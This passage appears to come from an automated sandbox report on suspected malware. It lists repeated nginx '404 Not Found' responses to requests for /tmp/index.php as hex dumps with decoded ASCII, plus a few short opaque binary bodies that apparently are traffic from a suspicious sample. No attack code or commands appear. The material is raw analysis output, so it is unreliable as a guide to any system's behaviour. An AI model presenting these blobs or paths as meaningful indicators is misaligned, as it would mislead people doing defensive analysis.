72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:17:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:17:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:17:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:17:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:17:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:18:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:18:02 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:18:03 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb Data Ascii: #\6Y9l_m=rA
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:18:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:18:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:18:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:18:10 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:18:12 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:18:13 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 08 65 42 f1 3a 0f e9 ff 09 fc 8c e5 e5 23 98 2b cd fb 2c 5e 10 dd db c0 da 61 d9 2e 19 12 8b 07 99 16 74 52 43 f2 99 67 f4 75 a0 49 4e 1b 77 2c 12 da 20 ec 32 0b a9 86 7c 7d c8 Data Ascii: #\6eB:#+,^a.tRCguINw, 2|}
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:18:19 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:19:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:19:37 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
